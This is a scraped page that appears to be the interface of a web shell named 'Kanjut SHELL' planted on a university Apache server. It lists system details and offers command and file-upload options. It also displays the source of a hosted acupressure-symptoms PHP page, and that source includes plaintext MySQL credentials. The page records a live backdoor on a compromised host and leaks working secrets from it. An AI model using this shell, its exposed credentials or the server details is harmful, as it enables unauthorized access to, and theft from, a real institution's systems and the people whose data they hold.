Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.188.107.57
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/cngray/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/cngray/www/acupoints.php
<center>
<body bgcolor = "moccasin">
<font size = "7" color = "green"><b>
All Symptoms and Points
</b>
</font>

<hr>
<font size = "5">
The table below shows all possible symptoms along with all the steps that 
can be taken to relieve each symptom. When starting to list your symptoms 
always start with the least painful then progress to the most painful. The 
name of the symptoms will be found on the far left of the table followed by 
the list of rememdies to relieve the problem to its right. By clicking on 
a rememdy you will be directed to a webpage that shows you where to apply 
pressure.<p>

<center>
<font size = 4>
<?php

        $host = 'localhost';
        $user = 'jdwhitehurst';
        $passwd = 'vwccsjdwhitehurst';
        $database = 'jdwhitehurst';

        $connect = mysqli_connect($host, $user, $passwd);
        $query = "select * from POINTS";

        mysqli_select_db($connect, $database);
        $result_id = mysqli_query($connect, $query);
	
	
        if($result_id)
        {
                print '<table border=1>';
                print '<TH> SYMPTOM <TH> REMEDIES';
                while($row = mysqli_fetch_assoc($result_id))
                {      
			 print '<TR>';
			 print "<td>".$row['SYMPTOM']. "</td>";
			 print "<td><a href =".$row["REMEDIES"].">
				 Show remedy for symptom </a></td>";
		         print '</TR>';
                }
		print '<table border=1>';
		print '<TR><A HREF = acuMain.html style = "color : black"> 
			Main_Page</a></TR>';
        }
        else
                print "Fail.<p>";
	
        mysqli_close($connect);
?>
</font>
</center>
<p>



Stv3n404 - 2023